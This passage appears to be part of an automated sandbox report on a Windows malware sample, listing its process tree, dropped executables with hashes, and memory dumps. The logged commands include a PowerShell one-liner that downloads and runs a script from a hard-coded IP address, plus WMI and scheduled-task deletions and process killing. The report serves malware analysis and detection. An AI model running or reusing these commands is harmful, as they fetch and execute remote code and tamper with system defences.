          Command line: SCHTASKS /Delete /TN "MicrosoftsWindows" /F
      * C:\Windows\SysWOW64\schtasks.exe
          Command line: SCHTASKS /Delete /TN "MicrosoftsWindowsu" /F
      * C:\Windows\SysWOW64\schtasks.exe
          Command line: SCHTASKS /Delete /TN "MicrosoftsWindowsa" /F
      * C:\Windows\SysWOW64\schtasks.exe
          Command line: SCHTASKS /Delete /TN "MicrosoftsWindowsu1" /F
      * C:\Windows\SysWOW64\Wbem\WMIC.exe
          Command line: wmic /NAMESPACE:"\\root\subscription" PATH __EventFilter WHERE Name="fuckamm3" DELETE
      * C:\Windows\SysWOW64\Wbem\WMIC.exe
          Command line: wmic /NAMESPACE:"\\root\subscription" PATH ActiveScriptEventConsumer WHERE Name="fuckamm4" DELETE
      * C:\Windows\SysWOW64\Wbem\WMIC.exe
          Command line: wmic /NAMESPACE:"\\root\subscription" PATH CommandLineEventConsumer WHERE Name="fuckamm4" DELETE
      * C:\Windows\SysWOW64\Wbem\WMIC.exe
          Command line: wmic /NAMESPACE:"\\root\subscription" PATH __FilterToConsumerBinding WHERE Filter="__EventFilter.Name='fuckamm4'" DELETE
      * C:\Windows\SysWOW64\Wbem\WMIC.exe
          Command line: wmic /NAMESPACE:"\\root\subscription" PATH __EventFilter WHERE Name="killmm3" DELETE
      * C:\Windows\SysWOW64\Wbem\WMIC.exe
          Command line: wmic /NAMESPACE:"\\root\subscription" PATH ActiveScriptEventConsumer WHERE Name="killmm4" DELETE
      * C:\Windows\SysWOW64\Wbem\WMIC.exe
          Command line: wmic /NAMESPACE:"\\root\subscription" PATH CommandLineEventConsumer WHERE Name="killmm4" DELETE
      * C:\Windows\SysWOW64\Wbem\WMIC.exe
          Command line: wmic /NAMESPACE:"\\root\subscription" PATH __FilterToConsumerBinding WHERE Filter="__EventFilter.Name='killmm4'" DELETE
      * C:\Windows\SysWOW64\cmd.exe
          Command line: cmd /c powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://185.26.113.95:8095/batpower2.txt')
        * C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            Command line: powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://185.26.113.95:8095/batpower2.txt')
- Blocklisted process makes network request
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c start c:\windows\inf\aspnet\lsma12.exe -p6⤵
-
\??\c:\windows\inf\aspnet\lsma12.exec:\windows\inf\aspnet\lsma12.exe -p7⤵
- Executes dropped EXE
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\system32\schtasks.exe" /run /tn oka6⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c start c:\windows\inf\winnts.exe6⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c start c:\windows\inf\aspnet\excludess.exe6⤵
-
\??\c:\windows\inf\aspnet\excludess.exec:\windows\inf\aspnet\excludess.exe7⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c start c:\windows\inf\aspnet\excludess2.exe6⤵
-
\??\c:\windows\inf\aspnet\excludess2.exec:\windows\inf\aspnet\excludess2.exe7⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c taskkill /f /im powershell.exe6⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im powershell.exe7⤵
- Kills process with taskkill
-
C:\Windows\system32\wbem\WmiApSrv.exeC:\Windows\system32\wbem\WmiApSrv.exe1⤵
-
\??\c:\windows\system32\cmd.EXEc:\windows\system32\cmd.EXE /c start c:\windows\inf\aspnet\lsma12.exe -p1⤵
-
\??\c:\windows\inf\aspnet\lsma12.exec:\windows\inf\aspnet\lsma12.exe -p2⤵
- Executes dropped EXE
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
- C:\Users\Admin\AppData\Local\Temp\excludes
  MD5    aa5b7a8546dafef6dc76aae4b8eb1282
  SHA1   37d551e05cb15c71082a1a305cdf13132ad3a1a8
  SHA256 d2b7b602afd65804a410dfadfb1bb9cd594e513fda7fdfa242d1237cb1ccf2b9
  SHA512 0d674bef05c250aee6c5b3e312a124830a58d85c1102d4dca23504a91a072b12caead4ad3b7e118210652af211b00239934f7e02418915c07fc12bbd60004272

- C:\Windows\INF\aspnet\excludess.exe
  MD5    5ca95841b2979a96453361358f6d860d
  SHA1   4088c98c806596008b62cd17d59e8c9a01291f1a
  SHA256 fe7cc5a2579668cb6afd239dc181c404ef602d72605fe46361e31cecb17187a2
  SHA512 d1d7cd8463e4fec463173045fcdbcfd0db85e0af62faad0fea96098341c977279fddb6a6eecf40d1a94b4dd094eba1311caf98443422a89c8b68f76eec7bc8d1

- C:\Windows\INF\aspnet\excludess2.exe
  MD5    b90adc3845ca490d93301b4934618787
  SHA1   657beaf3ef7988d3960e1d4d7177d0203c4d9dff
  SHA256 39c7cfc51ff86a023b635fec42de605e672d9050711b70ae0a89b4ac50f245ea
  SHA512 61423076e8394cdbbb5178d8d29f3c6e1e92d03c7b1d0641acdb8a1a133ba3a311cbf4814a61d3ccc5bb8648a2f85187aa6c95469ebf9abec8dd40730c6007fa

- C:\Windows\INF\aspnet\lsma12.exe
  MD5    93515e391ac22a065279cadd8551d2bc
  SHA1   a5e565c37fa3747c1d17e0975d86258ae3de671e
  SHA256 b942960f1b5ead6933f527b95e87cfc994ddaffc910dca727f56b04706161544
  SHA512 2886a1f22c9ca4d52d6b07eccf9d4890e774382d2bc0c14daf4358c506329f61c79c4327f9b6ff3ffc0a79068cbfe456c033ee9ad7ca3eb60a2faf5dbe08e67f

- C:\Windows\Temp\ntuser.dat
  MD5    2466183331792219dc19a0d09008bc4f
  SHA1   27a78da31bda636f82f343faeea1ebb2b06cd2f8
  SHA256 935978001c84f3f0d458ade10f113d60567f1edb43c5ae4c09541cf9a96a90ea
  SHA512 d949019acffcac880451717e0e21105d7c7f31d130b5028df57d147c7262f9d75e6bba9983511d444caddb40e2bdb1f62cf659c4c8b54e91f05ec82fee8dcacd

- C:\Windows\temp\c3m.bat
  MD5    f09b5034130b1b62367495e0caf7f859
  SHA1   5896b28afc5081c8e83b3a593d4d879287fbca1d
  SHA256 238eaf1c5a1d2706096529e152a51a0944507c1fc93b4f08648aaa9716901c6a
  SHA512 a80054f9780e5055101ebeb0790988bf00e2a4a3e74df82df11d0c8063681fe8636fd807608f1fde8613f708cd5e54d58d4e74c7e6967d98461e1416ddca1baa

- C:\windows\TEMP\n.vbs
  MD5    31838bf97dfcae8710f2f18183e2c888
  SHA1   2422dcf04d4385017d9a5ab676d6b7e0d95d9ab4
  SHA256 ccbc9185434841ba52a8eaee221a322c200999b5f555bf7c76943cc3ad22c435
  SHA512 945ae1351737ededa42ce9921f354240ab4205fd4ac4bdce47daae560ca7854a86e9afe23b9c7d60d30f8ae959768df049096041f38a5973d978d24b40da31bc

- \??\c:\windows\inf\aspnet\config.json
  MD5    64ef6c161e3303ed0868b5f106682a18
  SHA1   1f34854dfab29016333a381dcb8e66249c67ae15
  SHA256 2babf83d7a14c513b8a39ed20d1bf959376cd96a7350a47e61e56a277fa0cbd9
  SHA512 4ef573f8e0aa10f74eb7160e41cbf701a0b4e2de0f321c6ef48b5c18689e8d7fafa1e8743cf2bc1adbd8753e6e1c3cb4ee32113f1719e48271cd38113d60b049

- \??\c:\windows\inf\aspnet\excludess.exe
  MD5    5ca95841b2979a96453361358f6d860d
  SHA1   4088c98c806596008b62cd17d59e8c9a01291f1a
  SHA256 fe7cc5a2579668cb6afd239dc181c404ef602d72605fe46361e31cecb17187a2
  SHA512 d1d7cd8463e4fec463173045fcdbcfd0db85e0af62faad0fea96098341c977279fddb6a6eecf40d1a94b4dd094eba1311caf98443422a89c8b68f76eec7bc8d1

- \??\c:\windows\inf\aspnet\excludess2.exe
  MD5    b90adc3845ca490d93301b4934618787
  SHA1   657beaf3ef7988d3960e1d4d7177d0203c4d9dff
  SHA256 39c7cfc51ff86a023b635fec42de605e672d9050711b70ae0a89b4ac50f245ea
  SHA512 61423076e8394cdbbb5178d8d29f3c6e1e92d03c7b1d0641acdb8a1a133ba3a311cbf4814a61d3ccc5bb8648a2f85187aa6c95469ebf9abec8dd40730c6007fa

- \??\c:\windows\inf\aspnet\lsma12.exe
  MD5    93515e391ac22a065279cadd8551d2bc
  SHA1   a5e565c37fa3747c1d17e0975d86258ae3de671e
  SHA256 b942960f1b5ead6933f527b95e87cfc994ddaffc910dca727f56b04706161544
  SHA512 2886a1f22c9ca4d52d6b07eccf9d4890e774382d2bc0c14daf4358c506329f61c79c4327f9b6ff3ffc0a79068cbfe456c033ee9ad7ca3eb60a2faf5dbe08e67f

- memory/204-154-0x0000000000000000-mapping.dmp
- memory/212-219-0x0000022079880000-0x0000022079890000-memory.dmp  (Filesize 64KB)
- memory/212-215-0x0000022079860000-0x0000022079870000-memory.dmp  (Filesize 64KB)
- memory/212-229-0x00000220798C0000-0x00000220798D0000-memory.dmp  (Filesize 64KB)
- memory/212-226-0x00000220798A0000-0x00000220798B0000-memory.dmp  (Filesize 64KB)
- memory/212-228-0x00000220798B0000-0x00000220798C0000-memory.dmp  (Filesize 64KB)
- memory/212-227-0x0000022079890000-0x00000220798A0000-memory.dmp  (Filesize 64KB)
- memory/648-156-0x0000000000000000-mapping.dmp
- memory/740-114-0x0000000000000000-mapping.dmp
- memory/800-176-0x0000000000000000-mapping.dmp
- memory/804-119-0x0000000000000000-mapping.dmp
- memory/860-178-0x0000000000000000-mapping.dmp
- memory/908-177-0x0000000000000000-mapping.dmp
- memory/996-179-0x0000000000000000-mapping.dmp
- memory/996-120-0x0000000000000000-mapping.dmp
- memory/1008-168-0x0000000000000000-mapping.dmp
- memory/1032-121-0x0000000000000000-mapping.dmp
- memory/1100-127-0x0000000000000000-mapping.dmp
- memory/1160-122-0x0000000000000000-mapping.dmp
- memory/1300-153-0x0000000000000000-mapping.dmp
- memory/1332-161-0x0000000000000000-mapping.dmp
- memory/1364-123-0x0000000000000000-mapping.dmp
- memory/1376-159-0x0000000000000000-mapping.dmp
- memory/1448-170-0x0000000000000000-mapping.dmp
- memory/1524-124-0x0000000000000000-mapping.dmp
- memory/1528-157-0x0000000000000000-mapping.dmp
- memory/1660-144-0x0000000000000000-mapping.dmp
- memory/1800-125-0x0000000000000000-mapping.dmp
- memory/1820-126-0x0000000000000000-mapping.dmp
- memory/1904-148-0x0000000000000000-mapping.dmp
- memory/1940-204-0x0000000009B10000-0x0000000009B11000-memory.dmp  (Filesize 4KB)
- memory/1940-187-0x0000000007820000-0x0000000007821000-memory.dmp  (Filesize 4KB)
- memory/1940-185-0x00000000073C2000-0x00000000073C3000-memory.dmp  (Filesize 4KB)
- memory/1940-188-0x00000000080A0000-0x00000000080A1000-memory.dmp  (Filesize 4KB)
- memory/1940-199-0x00000000073C3000-0x00000000073C4000-memory.dmp  (Filesize 4KB)
- memory/1940-186-0x00000000078C0000-0x00000000078C1000-memory.dmp  (Filesize 4KB)
- memory/1940-198-0x0000000009580000-0x0000000009581000-memory.dmp  (Filesize 4KB)
- memory/1940-189-0x0000000008110000-0x0000000008111000-memory.dmp  (Filesize 4KB)
- memory/1940-183-0x00000000073C0000-0x00000000073C1000-memory.dmp  (Filesize 4KB)
- memory/1940-184-0x0000000007A00000-0x0000000007A01000-memory.dmp  (Filesize 4KB)
- memory/1940-197-0x000000000A000000-0x000000000A001000-memory.dmp  (Filesize 4KB)
- memory/1940-182-0x0000000004D80000-0x0000000004D81000-memory.dmp  (Filesize 4KB)
- memory/1940-205-0x0000000009AB0000-0x0000000009AB1000-memory.dmp  (Filesize 4KB)
- memory/1940-192-0x0000000008890000-0x0000000008891000-memory.dmp  (Filesize 4KB)
- memory/1940-206-0x000000000AB80000-0x000000000AB81000-memory.dmp  (Filesize 4KB)
- memory/1940-191-0x0000000008A90000-0x0000000008A91000-memory.dmp  (Filesize 4KB)
- memory/1940-190-0x0000000008070000-0x0000000008071000-memory.dmp  (Filesize 4KB)
- memory/2080-128-0x0000000000000000-mapping.dmp
- memory/2112-173-0x0000000000000000-mapping.dmp
- memory/2124-165-0x0000000000000000-mapping.dmp
- memory/2148-164-0x0000000000000000-mapping.dmp
- memory/2292-129-0x0000000000000000-mapping.dmp
- memory/2312-158-0x0000000000000000-mapping.dmp
- memory/2340-167-0x0000000000000000-mapping.dmp
- memory/2500-130-0x0000000000000000-mapping.dmp
- memory/2568-131-0x0000000000000000-mapping.dmp
- memory/2804-132-0x0000000000000000-mapping.dmp
- memory/2828-133-0x0000000000000000-mapping.dmp
- memory/3240-134-0x0000000000000000-mapping.dmp
- memory/3336-163-0x0000000000000000-mapping.dmp
- memory/3340-166-0x0000000000000000-mapping.dmp
- memory/3388-172-0x0000000000000000-mapping.dmp
- memory/3440-117-0x0000000000000000-mapping.dmp
- memory/3848-174-0x0000000000000000-mapping.dmp
- memory/3880-135-0x0000000000000000-mapping.dmp
- memory/4008-171-0x0000000000000000-mapping.dmp
- memory/4036-140-0x0000000000000000-mapping.dmp
- memory/4048-169-0x0000000000000000-mapping.dmp
- memory/4060-136-0x0000000000000000-mapping.dmp
- memory/4068-138-0x0000000000000000-mapping.dmp
- memory/4168-118-0x0000000000000000-mapping.dmp
- memory/4332-139-0x0000000000000000-mapping.dmp
- memory/4352-175-0x0000000000000000-mapping.dmp
- memory/4480-137-0x0000000000000000-mapping.dmp
- memory/4496-155-0x0000000000000000-mapping.dmp
- memory/4528-142-0x0000000000000000-mapping.dmp
- memory/4556-141-0x0000000000000000-mapping.dmp
- memory/4568-143-0x0000000000000000-mapping.dmp
- memory/4580-147-0x0000000000000000-mapping.dmp
- memory/4596-146-0x0000000000000000-mapping.dmp
- memory/4604-145-0x0000000000000000-mapping.dmp
- memory/4700-160-0x0000000000000000-mapping.dmp
- memory/4728-162-0x0000000000000000-mapping.dmp
- memory/4736-152-0x0000000000000000-mapping.dmp
- memory/4748-149-0x0000000000000000-mapping.dmp
- memory/4752-151-0x0000000000000000-mapping.dmp
- memory/4780-150-0x0000000000000000-mapping.dmp